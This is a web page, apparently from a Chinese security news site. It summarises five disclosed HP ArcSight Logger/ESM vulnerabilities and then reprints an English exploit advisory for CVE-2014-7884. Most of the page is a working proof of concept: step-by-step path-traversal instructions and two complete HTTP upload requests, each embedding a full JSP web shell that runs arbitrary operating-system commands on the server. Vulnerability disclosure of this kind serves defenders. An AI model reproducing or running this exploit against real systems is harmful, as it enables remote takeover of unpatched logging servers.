ArcSight upload poc

本周二，美国卡内基梅隆大学计算机紧急响应小组（CERT）协调中心发布公告，波兰安全研究员Julian Horoszkiewicz在惠普的ArcSight系列产品上发现了5个安全漏洞。

漏洞一：上传任意文件

认证的攻击者可以利用ArcSight记录器上的漏洞，远程上传任意文件到受害者系统上。这使得攻击者可在拥有应用程序权限的服务器上执行恶意脚本。该产品的配置输入功能不会过滤文件名，因此攻击者可以实现上传任意文件的操作。

漏洞二：内容篡改

认证的攻击者可以篡改系统资源和解析器。之所以会存在这个问题是因为记录器会允许所有的用户访问某些配置功能，如输入、搜索和内容管理等功能，当然攻击者也可以了，正好趁机钻了这个空子。

漏洞三：外部实体注入

Horoszkiewicz还发现记录器内容输入部分的XML解析器很容易受到XML外部实体注入攻击，攻击者会利用这个漏洞在受害者服务器上执行任意脚本。

惠普ArcSight产品上的漏洞主要有两种类型：一种是跨站脚本（XSS）漏洞；另外一种是跨站请求伪造（CSRF）漏洞。攻击者可利用跨站脚本（XSS）漏洞损坏或者修改系统规则和资源，利用跨站请求伪造（CSRF）漏洞篡改系统上的数据。攻击者会利用这些漏洞欺骗受害者访问一个精心编制的恶意链接，至于会造成多大程度的伤害，这个要取决于受害者的权限。

受影响的产品

ArcSight企业安全管理器（ESM）：6.8c之前的所有版本ArcSight记录器：6.0p1之前的所有版本

POC




# Exploit Title: ArcSight Logger - Arbitrary File Upload (Code Execution)

# Date: 13.03.2015

# Exploit Author: Julian Horoszkiewicz

# Vendor Homepage: www.hp.com

# Software Link: http://www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/try-now.html

# Version: ArcSight Logger 5.3.1.6838.0 and prior versions

# Tested on: Red Hat Linux

# CVE: CVE-2014-7884

 

[ Description ]

Configuration import file upload capability does not fully sanitize file names, which allows attackers to put executable files into the document root. Upload of server side (JSP) script with shell accessing function in order to gain remote OS command execution has been conducted in the POC. To access vulnerable feature, user has to be authenticated in the console. Feature is available to all users, also non-administrative ones. Shell commands are executed with default NPA privileges (arcsight) giving full control over the service (for instance /etc/init.d/arcsight_logger stop has been successfully performed). The culprit feature is accessible to all authenticated users, including ones with sole read-only admin role.

 

 

[ Proof of Concept ]

Attention, to reproduce the attack for the first time, two requests are required.

First request magically creates subdirectory in the /opt/arcsight/current/backups upload dir.

Second one puts the actual JSP web shell into the document root, by using path traversal refering to the upload dir subdirectory.

Other combinations of direct name manipulation in order to upload anything to the document root did not succeed during the test (references to the upload dir without a subdirectory were refused by the application).

The only required difference between the requests to achieve successful upload into desired location is the filename property in the Content-Disposition HTTP header.

 

The general rule is as follows:

First request (create /opt/arcsight/current/backups/some_new_dir directory, the uploaded file is irrelevant):

Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/whatever"

Second request (upload the file into location of choice by traversally refering to that subdirectory):

Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"

 

Please also note that valid tokens (asf_token, session_string, JSESSIONID) are required.

The most efficient way to reproduce this is:

1) name the local JSP web shell file toanything.xml.gz extension

2) choose to import it in the Configuration->Content Management->Import section through the web browser

3) intercept the browser traffic with a local proxy (Burp Suite for instance)

4) change the filename property in the Content-Disposition header so it contains the name of new subdirectory and forward the request

5) send another copy of the same request, this time with filename referring to the subdirectory created with previous request, using path traversal to point into the Logger document root, successfully uploading the web shell.

6) Navigate the browser to http://victim.com:9000/logger/hellcode.jsp

 

Full requests:

 

POST /logger/import_content_config_upload.ftl? HTTP/1.1

Host: victim.com:9000

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?

Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.

Connection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------17152166115305

Content-Length: 1565

 

-----------------------------17152166115305

Content-Disposition: form-data; name="uploadid"

 

 

-----------------------------17152166115305

Content-Disposition: form-data; name="update"

 

true

-----------------------------17152166115305

Content-Disposition: form-data; name="asf_token"

 

7caea3f1-7bfb-4419-a4bb-4a19e3800bff

-----------------------------17152166115305

Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/hellcode.jsp"

Content-Type: application/x-gzip

 

<%@ page import="java.util.*,java.io.*"%>

<HTML>

<TITLE>Laudanum JSP Shell</TITLE>

<BODY>

Commands with JSP

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send"><br/>

If you use this against a Windows box you may need to prefix your command with cmd.exe /c

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

out.println("Command: " + request.getParameter("cmd") + "<BR>");

Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

OutputStream os = p.getOutputStream();

InputStream in = p.getInputStream();

DataInputStream dis = new DataInputStream(in);

String disr = dis.readLine();

while ( disr != null ) {

out.println(disr);

disr = dis.readLine();

}

}

%>

</pre>

<hr/>

<address>

Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>

Written by Tim Medin.<br/>

Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

</address>

</BODY></HTML>

 

-----------------------------17152166115305--

 

 

 

 

 

 

 

POST /logger/import_content_config_upload.ftl? HTTP/1.1

Host: victim.com:9000

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?

Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.

Connection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------17152166115305

Content-Length: 1565

 

-----------------------------17152166115305

Content-Disposition: form-data; name="uploadid"

 

 

-----------------------------17152166115305

Content-Disposition: form-data; name="update"

 

true

-----------------------------17152166115305

Content-Disposition: form-data; name="asf_token"

 

7caea3f1-7bfb-4419-a4bb-4a19e3800bff

-----------------------------17152166115305

Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"

Content-Type: application/x-gzip

 

<%@ page import="java.util.*,java.io.*"%>

<HTML>

<TITLE>Laudanum JSP Shell</TITLE>

<BODY>

Commands with JSP

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send"><br/>

If you use this against a Windows box you may need to prefix your command with cmd.exe /c

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

out.println("Command: " + request.getParameter("cmd") + "<BR>");

Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

OutputStream os = p.getOutputStream();

InputStream in = p.getInputStream();

DataInputStream dis = new DataInputStream(in);

String disr = dis.readLine();

while ( disr != null ) {

out.println(disr);

disr = dis.readLine();

}

}

%>

</pre>

<hr/>

<address>

Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>

Written by Tim Medin.<br/>

Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

</address>

</BODY></HTML>

 

-----------------------------17152166115305--

 

 

 

[ Time line ]

28.08.2014 - vulnerability report sent to HP

21.01.2015 - new version containing the fix released by HP

12.03.2015 - security bulletin published (CVE-2014-7884)

 

 

[ Credits ]

Julian Horoszkiewicz - IT Security Specialist @ ING Services Polska